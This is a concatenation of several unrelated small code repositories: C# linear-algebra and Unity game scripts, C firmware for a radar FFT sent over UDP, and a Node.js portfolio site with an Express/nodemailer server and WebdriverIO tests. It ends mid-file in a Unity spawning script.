SetPlayerMiddle(); } else if (e.Key == Key.Down) { wereldVectoren["Player"].Translate(0, 0, 10, true); SetPlayerMiddle(); } Draw(); } } } <file_sep>using System; using System.Collections.Generic; using System.Linq; using System.Security.AccessControl; using System.Text; using System.Threading.Tasks; namespace LINAL { class Perspective { private float _near, _far, _fieldOfView; /* * Creates a new pespective */ public Perspective(float near, float far) { _near = near; _far = far; _fieldOfView = 90; } /* * Sets the field of view */ public void SetFieldOfView(float fieldOfView) { this._fieldOfView = fieldOfView; } /* * Returns the field of view */ public float GetFieldOfView() { return this._fieldOfView; } /* * Sets the far value */ public void SetFar(float far) { this._far = far; } /* * Returns the far value */ public float GetFar() { return this._far; } /* * Sets the near value */ public void SetNear(float near) { this._near = near; } /* * Returns the near value */ public float GetNear() { return this._near; } /* * Calculates the scale based on the fieldofview and the near variable */ public float GetScale() { var rad = GonioFactory.DegreesToRadians(_fieldOfView); return (_near*GonioFactory.GetTrigonometricByRadians(rad*0.5f, Trigonometric.Tangent)); } /* * Returns the Pespective matrix */ public Matrix Get() { Matrix m = new Matrix(4,4); float[,] data = { { GetScale(), 0, 0, 0 }, { 0, GetScale(), 0, 0 }, { 0, 0, -_far/(_far - _near), -1 }, { 0, 0, (-_far*_near)/(_far - _near), 0 } }; m.SetData(data); return m; } /* * Calculates the pespective screensize */ public float GetScreenSize() { var tan = GonioFactory.GetTrigonometricByDegrees(_fieldOfView/2, Trigonometric.Tangent); var halfSize = tan*_far; return halfSize*2; } } } <file_sep>using System; using LINAL; using Microsoft.VisualStudio.TestTools.UnitTesting; namespace LINAL_Test { [TestClass] public class VectorTest { private Point P, Q, S; private Vector PSupport, PQ, PS; [TestInitialize] public void init() { P = new Point(3, -1, 2); Q = new Point(1, 3, 4); S = new Point(2, 3, 2); PSupport = P.MakeVector(); PQ = new Vector(P, Q); PS = new Vector(P, S); } [TestMethod] public void IsDependant() { Assert.AreEqual(false, PQ.IsDependantOf(PS)); } [TestMethod] public void Inproduct() { Assert.AreEqual(18, PQ.GetInproduct(PS)); } [TestMethod] public void CrossProduct() { Vector v = PQ.GetSimplified().GetCrossProduct(PS.GetSimplified()); Assert.AreEqual(-4, v.GetX()); Assert.AreEqual(-1, v.GetY()); Assert.AreEqual(-2, v.GetZ()); } [TestMethod] public void PointInPlane() { Plane p = new Plane(); p.Add(P); p.Add(Q); p.Add(S); p.BuildFormula(); Assert.AreEqual(true, p.IsInPlane(new Point(-2, 13, 5))); } } } <file_sep>using System; using System.Collections.Generic; using System.Linq; using System.Text; using System.Threading.Tasks; namespace LINAL { class GonioFactory { /* * Returns the Arctrigonometric of a function, based on degrees */ public static float GetArcTrigonometricByDegrees(float value1, float value2, Trigonometric tri) { float radians = GetArcTrigonometricByRadians(value1, value2, tri); return RadiansToDegrees(radians); } /* * Returns the Arctrigonometric of a function, based on radians */ public static float GetArcTrigonometricByRadians(float value1, float value2, Trigonometric tri) { double result = value1 / value2; if(tri == Trigonometric.Sine) return (float)Math.Asin(result); if (tri == Trigonometric.Cosine) return (float)Math.Acos(result); if (tri == Trigonometric.Tangent) return (float)Math.Atan(result); if (tri == Trigonometric.Tangent2) return (float) Math.Atan2(value1,value2); else return (float) Trigonometric.Undefined; } /* * Converts degrees to radians */ public static float DegreesToRadians(float degrees) { return (float)(degrees*(Math.PI/180.0)); } /* * Converts radians to degrees */ public static float RadiansToDegrees(float radians) { return (float)(radians / Math.PI * 180); } /* * Returns the trigonometric of a function, based on radians */ public static float GetTrigonometricByRadians(float radians, Trigonometric tri) { if (tri == Trigonometric.Sine) return (float)Math.Sin(radians); if (tri == Trigonometric.Cosine) return (float)Math.Cos(radians); if (tri == Trigonometric.Tangent) return (float)Math.Tan(radians); else return (float)Trigonometric.Undefined; } /* * Returns the trigonometric of a function, based on degrees */ public static float GetTrigonometricByDegrees(float degrees, Trigonometric tri) { float radians = DegreesToRadians(degrees); return GetTrigonometricByRadians(radians, tri); } } /* * Enumeration for trigonometric functions */ public enum Trigonometric { Undefined = 0, Sine = 1, Cosine = 2, Tangent = 3, Tangent2 = 4 } }
20420ab888452e999203aae08da44a682e58582b
[ "C#" ]
11
C#
Lwra93/LINAL
2ceea5045da3c58e58e0f6561818c6f24e69e90f
7f6360cdad1b86c02c4bec186649f01fb50aaed7
refs/heads/master
<repo_name>AlSilantyev/MK60DN512VLQ10<file_sep>/Radar_2Ch_FFT_UDP.c /** * @file MK60DN512xxx10_Project.c * @brief Application entry point. */ #include <stdio.h> #include <stdlib.h> #include "fsl_enet.h" #include "fsl_phy.h" #include "fsl_sysmpu.h" #include "fsl_adc16.h" #include "fsl_cmp.h" #include "fsl_lptmr.h" #include "board.h" #include "peripherals.h" #include "pin_mux.h" #include "clock_config.h" #include "MK60D10.h" #include "arm_math.h" #include "fsl_debug_console.h" #include "fsl_common.h" #include "UDP_sender.h" /* TODO: insert other include files here. */ void Get_Vector(); void Data_Process(); void Jubula_Event(); /******************************************************************************* * Prototypes ******************************************************************************/ uint16_t TimeToEvent = 50; uint16_t ChanelA[2048]; uint16_t ChanelB[2048]; uint16_t capData[4096]; uint8_t numPack = 8; float32_t Input[2048]; float32_t Output[4096]; uint32_t fftSize = 2048; //1024; uint32_t ifftFlag = 0; uint32_t doBitReverse = 1; arm_rfft_instance_f32 rfft_inst; arm_cfft_radix4_instance_f32 cfft_inst; lptmr_config_t lptmrConfig; #define LPTMR_LED_HANDLER LPTMR0_IRQHandler #define LPTMR_SOURCE_CLOCK CLOCK_GetFreq(kCLOCK_LpoClk) #define LPTMR_USEC_COUNT 200000U cmp_config_t mCmpConfigStruct; cmp_dac_config_t mCmpDacConfigStruct; #define CMP_BASE CMP1 #define CMP_USER_CHANNEL 3U #define CMP_DAC_CHANNEL 1U #define CMP_IRQ_ID CMP1_IRQn #define CMP_IRQ_HANDLER_FUNC CMP1_IRQHandler volatile uint32_t g_CmpFlags = 0U; adc16_config_t adc16_1ConfigStruct; adc16_channel_config_t adc16_1ChannelConfigStruct; #define ADC16_1_BASE ADC1 #define ADC16_1_CHANNEL_GROUP 0U #define ADC16_1_USER_CHANNEL 0U adc16_config_t adc16_0ConfigStruct; adc16_channel_config_t adc16_0ChannelConfigStruct; #define ADC16_0_BASE ADC0 #define ADC16_0_CHANNEL_GROUP 0U #define ADC16_0_USER_CHANNEL 0U /******************************************************************************* * Code ****************************************************************************/ int main(void) { BOARD_InitBootPins(); BOARD_InitBootClocks(); BOARD_InitBootPeripherals(); BOARD_InitDebugConsole(); SYSMPU_Enable(SYSMPU, false); ENET_Initialization(); //GPIO_SetPinsOutput(PTB, 1u << 4); //GPIO_SetPinsOutput(PTB, 1u << 5); //GPIO_SetPinsOutput(PTB, 1u << 6); GPIO_SetPinsOutput(PTB, 1u << 7); ADC16_GetDefaultConfig(&adc16_1ConfigStruct); adc16_1ConfigStruct.enableHighSpeed = true; adc16_1ConfigStruct.enableLowPower = false; adc16_1ConfigStruct.clockSource = kADC16_ClockSourceAlt0; adc16_1ConfigStruct.enableAsynchronousClock = false; adc16_1ConfigStruct.clockDivider = kADC16_ClockDivider1; adc16_1ConfigStruct.resolution = kADC16_ResolutionDF13Bit; adc16_1ConfigStruct.longSampleMode = kADC16_LongSampleDisabled; adc16_1ConfigStruct.enableContinuousConversion = true; ADC16_Init(ADC16_1_BASE, &adc16_1ConfigStruct); ADC16_EnableHardwareTrigger(ADC16_1_BASE, false); /* Make sure the software trigger is used. */ ADC16_SetHardwareAverage(ADC16_1_BASE, kADC16_HardwareAverageDisabled); adc16_1ChannelConfigStruct.channelNumber = ADC16_1_USER_CHANNEL; adc16_1ChannelConfigStruct.enableDifferentialConversion = true; adc16_1ChannelConfigStruct.enableInterruptOnConversionCompleted = false; ADC16_GetDefaultConfig(&adc16_0ConfigStruct); adc16_0ConfigStruct.enableHighSpeed = true; adc16_0ConfigStruct.enableLowPower = false; adc16_0ConfigStruct.clockSource = kADC16_ClockSourceAlt0; adc16_0ConfigStruct.enableAsynchronousClock = false; adc16_0ConfigStruct.clockDivider = kADC16_ClockDivider1; adc16_0ConfigStruct.resolution = kADC16_ResolutionDF13Bit; adc16_0ConfigStruct.longSampleMode = kADC16_LongSampleDisabled; adc16_0ConfigStruct.enableContinuousConversion = true; ADC16_Init(ADC16_0_BASE, &adc16_0ConfigStruct); ADC16_EnableHardwareTrigger(ADC16_0_BASE, false); /* Make sure the software trigger is used. */ ADC16_SetHardwareAverage(ADC16_0_BASE, kADC16_HardwareAverageDisabled); adc16_0ChannelConfigStruct.channelNumber = ADC16_0_USER_CHANNEL; adc16_0ChannelConfigStruct.enableDifferentialConversion = true; adc16_0ChannelConfigStruct.enableInterruptOnConversionCompleted = false; ADC16_SetChannelConfig(ADC16_1_BASE, ADC16_1_CHANNEL_GROUP, &adc16_1ChannelConfigStruct); ADC16_SetChannelConfig(ADC16_0_BASE, ADC16_0_CHANNEL_GROUP, &adc16_0ChannelConfigStruct); /* Configure LPTMR */ LPTMR_GetDefaultConfig(&lptmrConfig); LPTMR_Init(LPTMR0, &lptmrConfig); LPTMR_SetTimerPeriod(LPTMR0, USEC_TO_COUNT(LPTMR_USEC_COUNT, LPTMR_SOURCE_CLOCK)); LPTMR_EnableInterrupts(LPTMR0, kLPTMR_TimerInterruptEnable); EnableIRQ(LPTMR0_IRQn); /* Configure CMP */ CMP_GetDefaultConfig(&mCmpConfigStruct); CMP_Init(CMP_BASE, &mCmpConfigStruct); mCmpDacConfigStruct.referenceVoltageSource = kCMP_VrefSourceVin2; mCmpDacConfigStruct.DACValue = 32U; CMP_SetDACConfig(CMP_BASE, &mCmpDacConfigStruct); CMP_SetInputChannels(CMP_BASE, CMP_USER_CHANNEL, CMP_DAC_CHANNEL); CMP_EnableInterrupts(CMP_BASE, kCMP_OutputRisingInterruptEnable | kCMP_OutputFallingInterruptEnable); EnableIRQ(CMP1_IRQn); //DEMO_CMP_IRQ_ID); // RFFT initialization arm_rfft_init_f32(&rfft_inst, &cfft_inst, fftSize, ifftFlag, doBitReverse); PRINTF("Hello World\n"); for (uint16_t i=0;i<4096;i++){ capData[i] = i;} LPTMR_StartTimer(LPTMR0); while (1){} return 0 ; } //------------------------- Timer Interrupt ------------------------------------------------- void LPTMR_LED_HANDLER(void) { LPTMR_ClearStatusFlags(LPTMR0, kLPTMR_TimerCompareFlag); if (TimeToEvent > 0) { TimeToEvent --; PRINTF("TimeToEvent %d\n", TimeToEvent); } else if(TimeToEvent == 0) { Jubula_Event(); } __DSB(); __ISB(); } //--------------------------- CMP Interrupt -------------------------------------------------- void CMP_IRQ_HANDLER_FUNC(void) { g_CmpFlags = CMP_GetStatusFlags(CMP_BASE); CMP_ClearStatusFlags(CMP_BASE, kCMP_OutputRisingEventFlag | kCMP_OutputFallingEventFlag); if (0U != (g_CmpFlags & kCMP_OutputRisingEventFlag)) { TimeToEvent = 50; Jubula_Event(); } } void Jubula_Event(void) { GPIO_SetPinsOutput(PTB, 1u << 3); Get_Vector(); Data_Process(); Send_UDP(numPack, capData); GPIO_ClearPinsOutput(PTB, 1u << 3); } void Get_Vector() { GPIO_SetPinsOutput(PTB, 1u << 4); for(int i=0;i<2048;i++) { while (0U == (kADC16_ChannelConversionDoneFlag & ADC16_GetChannelStatusFlags(ADC16_1_BASE, ADC16_1_CHANNEL_GROUP))){} ChanelB[i] = ADC16_GetChannelConversionValue(ADC16_1_BASE, ADC16_1_CHANNEL_GROUP); while (0U == (kADC16_ChannelConversionDoneFlag & ADC16_GetChannelStatusFlags(ADC16_0_BASE, ADC16_0_CHANNEL_GROUP))){} //ChanelA[i] = ADC16_GetChannelConversionValue(ADC16_0_BASE, ADC16_0_CHANNEL_GROUP); Input[i] = (float32_t)(ADC16_GetChannelConversionValue(ADC16_0_BASE, ADC16_0_CHANNEL_GROUP) - 2048); } GPIO_ClearPinsOutput(PTB, 1u << 4); } void Data_Process() { GPIO_SetPinsOutput(PTB, 1u << 5); arm_rfft_f32(&rfft_inst, Input, Output); arm_cmplx_mag_f32(Output, Input, fftSize); for (int i=0;i<1024; i++) { capData[i] = (uint16_t)(Input[i]); } /* for (int i=0;i<2048; i++) { Input[i]= (float32_t)(ChanelB[i] -2048); } //arm_rfft_init_f32(&rfft_inst, &cfft_inst, fftSize, ifftFlag, doBitReverse); arm_rfft_f32(&rfft_inst, Input, Output); arm_cmplx_mag_f32(Output, Input, fftSize); for (int i=0;i<1024; i++) { capData[i+1024] = (uint16_t)(Input[i]); } */ GPIO_ClearPinsOutput(PTB, 1u << 5); }
078275b1bf7d84fbf12873c0089d5b2f846f7da7
[ "C" ]
1
C
AlSilantyev/MK60DN512VLQ10
284baf279f1e73093f4d57f17f2701931dd2ef12
073e4094ed79a9bb48937fa875d48b31e5fc08d7
refs/heads/master
<repo_name>sanquinluis/porfoliopage<file_sep>/server.js // Dependencies // =========================================================== var express = require('express'); var bodyParser = require('body-parser'); var path = require('path'); var nodemailer = require('nodemailer'); var smtpTransport = require('nodemailer-smtp-transport'); var http = require('http'); // Sets up the Express App // ============================================================= var app = express(); var PORT = process.env.PORT || 3000; app.use(bodyParser.json()); app.use(bodyParser.urlencoded({ extended: true})); app.use(bodyParser.text()); app.use(bodyParser.json({ type:'application/vnd.api+json' })); // =========================================================== app.use(express.static('public')); app.use(express.static('javascript')); //accessing the Front/html pages // =========================================================== app.get('/', function(req,res){ res.sendFile('html/index.html',{"root":__dirname}); console.log("nodemailer reading" + req.url); }); app.get('/contact', function (req,res) { res.sendFile('html/contact.html', {"root":__dirname}); }); app.get('/aboutme', function (req,res) { res.sendFile('html/about.html', {"root":__dirname}); }); //nodemailer sending mail functions // =========================================================== //sending mail function // sending mail function app.post('/contact', function(req, res){ if(req.body.email == "" || req.body.subject == "") { res.send("Error: Email & Subject should not blank"); return false; } // Sending Emails with SMTP, Configuring SMTP settings var smtpTransport = nodemailer.createTransport({ // host: "smtp.gmail.com", // hostname // secureConnection: true, // use SSL port: 465, // port for secure SMTP auth: { user: '<EMAIL>', pass: '' } }); var mailOptions = { from: "Node Emailer ✔ <<EMAIL>>", // sender address to: req.body.email, // list of receivers subject: "Test Subject ✔", // Subject line text: req.body.message, // plaintext body html: "<b>"+req.body.message+"</b>" // html body } smtpTransport.sendMail(mailOptions, function(error, response){ if(error){ res.send("Email could not sent due to error: "+error); }else{ res.send("Email has been sent successfully"); } }); }); // sending email using SMTP configuration //Server is listening. // =========================================================== app.listen(PORT, function(){ console.log("Express is Listening on Portal 3000"); }) <file_sep>/public/javascript/app.js $( document ).ready(function() { // Contact.html to send email using nodemailer $('#send_email').click(function(event){ event.preventDefault(); var name = $('#name').val(); var lastname = $('#lastname').val(); var phone = $('#phone').val(); var email = $('#email').val(); var message = $('#message').val(); console.log(name, lastname, phone, email, message); if (name !== '' && lastname !== '' && phone !== '' && email !== '' && message !== ''){ console.log('post'); $.post('http://localhost:3000/contact', { name: name, lastname: lastname, phone: phone, email: email, message: message } , function(data) { if(data == 'sent') { $('.alert').html('<strong> Success! </strong> Your message has been sent!').addClass('sucess'); } else { $('.alert').html("<strong> Ups! </strong> Your message didn't go through ").addClass('error'); } }); } }); }); <file_sep>/README.md # porfolioPage Using HTML, CSS, Bootstrap, JavaScript and JQuery to build my personal Porfolio Page.
1197ed098177cc2471c4a84b573926168c3dbb50
[ "JavaScript", "Markdown" ]
3
JavaScript
sanquinluis/porfoliopage
986108e7069ad4ba13ebaaff9f78fe065e5e916e
0c9dd7dadefe28f543a8293df546c00438678f9c
refs/heads/master
<repo_name>T-DevH/GoogleNet<file_sep>/README.md # Training GoogleNet from scratch Train MiniGoogLeNet and GoogLeNet on CIFAR-10 and Tiny ImageNet datasets. ## Code objective - Build MiniGoogLeNet and train the network on CIFAR-10 dataset. - Build GoogLeNet and train the network on Tiny ImageNet dataset. ## Packages - Python 3.6 - Cuda 10.2 - cuDNN 7.6.5 - Tensorflow 2.0 - Numpy - scikit-learn 0.22 - imutils 0.5.3 ## Training Template Tuning and optimizing deep-learning networks is more about intuition, practice and patience than a technique. Choosing the correct hyper-parameters and getting a complex network to learn properly can be daunting to developers not well versed in the craft. Getting a deep neural network to converge by selecting the optimal hyper-parameters is a difficult task. This difficulty grows quickly with the complexity of a neural network model. The main questions: (1) Is the learning rate right? (2) The regularization too strong? (3) The dropout keep rate too low? (4) Does the model have sufficient learning capacity? All these questions are difficult to answer. ## GoogleNet In 2014 <NAME> introduced a new Deep CNN architecture named inception in his paper Going Deeper with Convolutions. The author achieved a new state of the art for classification and detection in the ImageNet Large-Scale Visual Recognition Challenge 2014. The main innovation of this architecture is the improved utilization of the computing resources inside the network. The author demonstrated how to increase the depth and width of the network while keeping the computational budget constant. The obvious way to improve the performance of deep neural networks is by increasing their size.This includes both increasing the depth: the number of network levels and increasing the width: the number of units at each level. However, this will lead to two main problems: With GoogleNet the idea is to increase the number of filters by using inception modules. While designing this model they have considered the computational budget fixed. Therefore, this model is suitable for embedded systems and mobile and edge applications. Despite 22 layers, the number of parameters used used is 12 time less than AlexNet but its accuracy is significantly better. ![](Figures/Inception.png) ## MiniGoogLeNet on CIFAR-10 The architecture consists of a conv_module, inception_module downsample_module <file_sep>/rank_accuracy.py # USAGE # python rank_accuracy.py # import the necessary packages from config import tiny_imagenet_config as config from NNpipeline.preprocessing import ImageToArrayPreprocessor from NNpipeline.preprocessing import SimplePreprocessor from NNpipeline.preprocessing import MeanPreprocessor from NNpipeline.utils.ranked import rank5_accuracy from NNpipeline.io import HDF5DatasetGenerator from tensorflow.keras.models import load_model import json # load the RGB means for the training set means = json.loads(open(config.DATASET_MEAN).read()) # initialize the image preprocessors sp = SimplePreprocessor(64, 64) mp = MeanPreprocessor(means["R"], means["G"], means["B"]) iap = ImageToArrayPreprocessor() # initialize the testing dataset generator testGen = HDF5DatasetGenerator(config.TEST_HDF5, 64, preprocessors=[sp, mp, iap], classes=config.NUM_CLASSES) # load the pre-trained network print("[INFO] loading model...") model = load_model(config.MODEL_PATH) # make predictions on the testing data print("[INFO] predicting on test data...") predictions = model.predict_generator(testGen.generator(), steps=testGen.numImages // 64, max_queue_size=10) # compute the rank-1 and rank-5 accuracies (rank1, rank5) = rank5_accuracy(predictions, testGen.db["labels"]) print("[INFO] rank-1: {:.2f}%".format(rank1 * 100)) print("[INFO] rank-5: {:.2f}%".format(rank5 * 100)) # close the database testGen.close()<file_sep>/train.py # USAGE # python train.py --checkpoints output/checkpoints # python train.py --checkpoints output/checkpoints --model output/checkpoints/epoch_25.hdf5 --start-epoch 25 # set the matplotlib backend so figures can be saved in the background import matplotlib matplotlib.use("Agg") # import the necessary packages from config import tiny_imagenet_config as config from NNpipeline.preprocessing import ImageToArrayPreprocessor from NNpipeline.preprocessing import SimplePreprocessor from NNpipeline.preprocessing import MeanPreprocessor from NNpipeline.callbacks import EpochCheckpoint from NNpipeline.callbacks import TrainingMonitor from NNpipeline.io import HDF5DatasetGenerator from NNpipeline.nn.conv import DeeperGoogLeNet from tensorflow.keras.preprocessing.image import ImageDataGenerator from tensorflow.keras.optimizers import Adam from tensorflow.keras.models import load_model import tensorflow.keras.backend as K import argparse import json # construct the argument parse and parse the arguments ap = argparse.ArgumentParser() ap.add_argument("-c", "--checkpoints", required=True, help="path to output checkpoint directory") ap.add_argument("-m", "--model", type=str, help="path to *specific* model checkpoint to load") ap.add_argument("-s", "--start-epoch", type=int, default=0, help="epoch to restart training at") args = vars(ap.parse_args()) # construct the training image generator for data augmentation aug = ImageDataGenerator(rotation_range=18, zoom_range=0.15, width_shift_range=0.2, height_shift_range=0.2, shear_range=0.15, horizontal_flip=True, fill_mode="nearest") # load the RGB means for the training set means = json.loads(open(config.DATASET_MEAN).read()) # initialize the image preprocessors sp = SimplePreprocessor(64, 64) mp = MeanPreprocessor(means["R"], means["G"], means["B"]) iap = ImageToArrayPreprocessor() # initialize the training and validation dataset generators trainGen = HDF5DatasetGenerator(config.TRAIN_HDF5, 64, aug=aug, preprocessors=[sp, mp, iap], classes=config.NUM_CLASSES) valGen = HDF5DatasetGenerator(config.VAL_HDF5, 64, preprocessors=[sp, mp, iap], classes=config.NUM_CLASSES) # if there is no specific model checkpoint supplied, then initialize # the network and compile the model if args["model"] is None: print("[INFO] compiling model...") model = DeeperGoogLeNet.build(width=64, height=64, depth=3, classes=config.NUM_CLASSES, reg=0.0005) opt = Adam(1e-3) model.compile(loss="categorical_crossentropy", optimizer=opt, metrics=["accuracy"]) # otherwise, load the checkpoint from disk else: print("[INFO] loading {}...".format(args["model"])) model = load_model(args["model"]) # update the learning rate print("[INFO] old learning rate: {}".format( K.get_value(model.optimizer.lr))) K.set_value(model.optimizer.lr, 1e-5) print("[INFO] new learning rate: {}".format( K.get_value(model.optimizer.lr))) # construct the set of callbacks callbacks = [ EpochCheckpoint(args["checkpoints"], every=5, startAt=args["start_epoch"]), TrainingMonitor(config.FIG_PATH, jsonPath=config.JSON_PATH, startAt=args["start_epoch"])] # train the network model.fit_generator( trainGen.generator(), steps_per_epoch=trainGen.numImages // 64, validation_data=valGen.generator(), validation_steps=valGen.numImages // 64, epochs=10, max_queue_size=10, callbacks=callbacks, verbose=1) # close the databases trainGen.close() valGen.close()
faa00c850c80017b8f3c0863aced01f283fb82d9
[ "Markdown", "Python" ]
3
Markdown
T-DevH/GoogleNet
ac1774013d03437da7f86064267d12c086f64124
2501154705eb574540bbef9ea87bf1acbd79bfdd
refs/heads/master
<repo_name>OlegSimfi/oos-automation<file_sep>/autotests/pages/main.page.js class MainPage { get mainPageTitle() {return $('//h1'); } get crewMembersArray() {return $$('.CrewMemeber-name'); } get nameInput() {return $('#name'); } get cityInput() {return $('#city'); } get submitButton() {return $('//button[@type="submit"]'); } get clearButton() {return $('//button[.="Clear"]'); } get appliedMembersArray() {return $$('//h2[.="Applied"]/following-sibling::div[@class="CrewMember-container"]'); } get interviewingMembersArray() {return $$('//h2[.="Interviewing"]/following-sibling::div[@class="CrewMember-container"]'); } get hiredMembersArray() {return $$('//h2[.="Hired"]/following-sibling::div[@class="CrewMember-container"]'); } get сrewMemberUpToInterviewingButtonsArray() {return $$('//h2[.="Applied"]/following-sibling::div[@class="CrewMember-container"]//button[@class="CrewMember-up"]'); } get сrewMemberUpToHiredButtonsArray() {return $$('//h2[.="Interviewing"]/following-sibling::div[@class="CrewMember-container"]//button[@class="CrewMember-up"]'); } } module.exports = new MainPage();<file_sep>/autotests/tests/workflowApliedInterviewingHired.js const MainPage = require('../pages/main.page'); let nemeUserForMoving; describe("Workflow move (Applied-Interviewing-Hired)", function () { it("Open Main page", function () { browser.url(''); MainPage.mainPageTitle.waitForExist(); const mainPageTitle = MainPage.mainPageTitle.getText(); expect(mainPageTitle).to.contain('OpenOceanStudio: Crew Applications'); }); it("Find quantity of Applied users and take user for workflow Moving", function () { const appliedUsersArrayBeforeWorkflowMoving = MainPage.appliedMembersArray; // Get array of Applied users before searching const amountOfappliedUsersBeforeWorkflowMoving = appliedUsersArrayBeforeWorkflowMoving.length; //Find amount of users (Array length) expect(amountOfappliedUsersBeforeWorkflowMoving).to.equal(4); //According to the test data, there can only be one user in the Interview column nemeUserForMoving = appliedUsersArrayBeforeWorkflowMoving[0].getAttribute('textContent').slice(0, - 1); }); it("Moving from Applied to Interviewing", function () { const moveUpButtonArray = MainPage.сrewMemberUpToInterviewingButtonsArray; const moveUpButton = moveUpButtonArray[0]; // Not the best solution, but fast. But then we will check that there is no error. In a real situation, we would take a more optimal solution with the developer. moveUpButton.click(); }); it("Check Moving from Applied to Interviewing", function () { const amountOfappliedUsersAfterWorkflowMoving = MainPage.appliedMembersArray.length; expect(amountOfappliedUsersAfterWorkflowMoving).to.equal(3); // Amount of remaining users const interviewingMembersArrayLenth = MainPage.interviewingMembersArray.length; expect(interviewingMembersArrayLenth).to.equal(1); //According to the test data, there can only be one user in the Interview column const nameOfUserInInterviewColumn = MainPage.interviewingMembersArray[0].getAttribute('textContent').slice(0, - 2); expect(nameOfUserInInterviewColumn).to.contain(nemeUserForMoving); }); it("Moving from Interviewing to Hired", function () { const moveUpButtonArray = MainPage.сrewMemberUpToHiredButtonsArray; const moveUpButton = moveUpButtonArray[0]; moveUpButton.click(); }); it("Check Moving from Interviewing to Hired", function () { const amountOfInterviewingUsersAfterWorkflowMoving = MainPage.interviewingMembersArray.length; expect(amountOfInterviewingUsersAfterWorkflowMoving).to.equal(0); // Amount of remaining users const hiredMembersArrayLenth = MainPage.hiredMembersArray.length; expect(hiredMembersArrayLenth).to.equal(2); //According to the test data, there can only be one user in the Interview column const nameOfUserInHiredColumn = MainPage.hiredMembersArray[1].getAttribute('textContent').slice(0, - 1); expect(nameOfUserInHiredColumn).to.contain(nemeUserForMoving); }); });<file_sep>/autotests/tests/searchUserByName.js const MainPage = require('../pages/main.page'); let crewMembersArrayBeforeSearching = new Array(); let amountOfcrewMembersArrayBeforeSearching; let nameOfUserForSearching; describe("Search User by Name", function () { it("Open Main page", function () { browser.url(''); MainPage.mainPageTitle.waitForExist(); const mainPageTitle = MainPage.mainPageTitle.getText(); expect(mainPageTitle).to.contain('OpenOceanStudio: Crew Applications'); }); it("Find quantity of users and take user for searching", function () { crewMembersArrayBeforeSearching = MainPage.crewMembersArray; // Get array of users before searching amountOfcrewMembersArrayBeforeSearching = crewMembersArrayBeforeSearching.length; //Find amount of users (Array length) const userForSearching = crewMembersArrayBeforeSearching[0].getAttribute('textContent'); // Select a user to searching nameOfUserForSearching = userForSearching.split(' ')[0]; // Because the search is carried out only by name (Maybe a bug?) }); it("Search User by Name", function () { MainPage.nameInput.setValue(nameOfUserForSearching); MainPage.submitButton.click(); }); it("Check search result", function () { const crewMembersArrayBeforeSearching = MainPage.crewMembersArray; const lenthOfcrewMembersArrayAfterSearching = crewMembersArrayBeforeSearching.length; expect(lenthOfcrewMembersArrayAfterSearching).to.equal(1); // According to the test data, there is only one user with this name const foundUserAfterSearching = crewMembersArrayBeforeSearching[0].getAttribute('textContent'); expect(foundUserAfterSearching).to.contain('<NAME>'); }); it("Check the working of the Clear button", function () { MainPage.clearButton.click(); const lenthOfcrewMembersArrayAfterClear = MainPage.crewMembersArray.length; expect(lenthOfcrewMembersArrayAfterClear).to.equal(amountOfcrewMembersArrayBeforeSearching); // The length of the array after cleaning should be equal to the length of the array before searching }); });
a25a990e20c90a311ae5bf5cebe2ede347b43e7e
[ "JavaScript" ]
3
JavaScript
OlegSimfi/oos-automation
04e60ab136466c42828fc1d36158ff5399bc5b62
f26b48fb73913c30749398f83adc280b7e4f7fb8
refs/heads/master
<file_sep>using System.Collections; using System.Collections.Generic; using UnityEngine; public class ColorFlickering : MonoBehaviour { public float switchTime = 0.1f; float counter = 0; public Material[] colors; MeshRenderer localRenderer; int currentInd = 0; private void Awake() { localRenderer = GetComponent<MeshRenderer>(); } private void Update() { counter += Time.deltaTime; if (counter > switchTime) { localRenderer.material = colors[Mathf.FloorToInt(currentInd / 1) % colors.Length]; currentInd++; counter -= switchTime; } } #region SPOILER //public MeshRenderer rend; //public Material[] mats; //int currentMat = 0; //// Update is called once per frame //void Update() //{ // rend.material = mats[currentMat % 6]; // currentMat++; //} #endregion } <file_sep>using System.Collections; using System.Collections.Generic; using UnityEngine; public class LookAtMouse : MonoBehaviour { public GameObject player; public Transform laserPrefab; public LayerMask raycastMask; Transform laserDot; private void Awake() { laserDot = Instantiate(laserPrefab, Vector3.zero, Quaternion.identity); } // Update is called once per frame void Update() { LaserPointer(); TurningPlayer(); } void TurningPlayer() { Vector3 lookVector = laserDot.position - player.transform.position; lookVector.y = 0; player.transform.rotation = Quaternion.LookRotation(lookVector); } void LaserPointer() { Vector3 mousePoint; RaycastHit hit; Physics.Raycast(Camera.main.ScreenPointToRay(Input.mousePosition), out hit, Mathf.Infinity, raycastMask); mousePoint = hit.point; laserDot.position = mousePoint; } } <file_sep>using System.Collections; using System.Collections.Generic; using UnityEngine; using UnityEngine.Events; using UnityEngine.UI; using TMPro; public class Flooder : MonoBehaviour { #region SPOILER public TextMeshProUGUI countText; public Vector3 centerPoint; public float distanceBetweenObjects; public int numberOfObjects = 1000; public float timeBetweenSpawns; public Transform sphere; [System.Serializable] public class OnSpawn : UnityEvent<bool> { }; public OnSpawn onSphereSpawn; //public UnityEvent OnSpawn; [Header("SFX")] public AudioSource SFX; public AudioClip spawnSound; public AudioClip pauseOn; public AudioClip pauseOff; [Header("Music")] public AudioSource Music; public bool pausedFlooding = false; private void Start() { StartCoroutine(ProgressiveFlood()); //Flood(); //StartCoroutine(startDelay(2f)); } void Flood() { int columns, rows; columns = Mathf.RoundToInt(Mathf.Sqrt(numberOfObjects)); rows = columns; Vector3 firstPoint = new Vector3(centerPoint.x - ((columns - 1) / 2), centerPoint.y, centerPoint.z + ((rows - 1) / 2)); int count = 0; for (int x = 0; x < columns && count <= numberOfObjects; x++) { for (int z = 0; z < rows && count <= numberOfObjects; z++) { Instantiate(sphere, firstPoint + (Vector3.right * x) + (Vector3.forward * z), Quaternion.identity); count++; } } } IEnumerator startDelay(float delay) { yield return new WaitForSeconds(delay); Flood(); } IEnumerator ProgressiveFlood() { int columns, rows; columns = Mathf.CeilToInt(Mathf.Sqrt(numberOfObjects)); rows = columns; Vector3 firstPoint = new Vector3(centerPoint.x - ((columns - 1) / 2), centerPoint.y, centerPoint.z + ((rows - 1) / 2)); int count = 0; for (int x = 0; x < columns && count < numberOfObjects; x++) { for (int z = 0; z < rows && count < numberOfObjects; z++) { Instantiate(sphere, firstPoint + (Vector3.right * x) + (Vector3.forward * z), Quaternion.identity); count++; SFX.PlayOneShot(spawnSound); bool isEven = (count % 2 == 0); onSphereSpawn.Invoke(isEven); countText.text = count.ToString(); do { yield return new WaitForSeconds(timeBetweenSpawns); } while (pausedFlooding); } } } public void ToggleFlooding() { pausedFlooding = 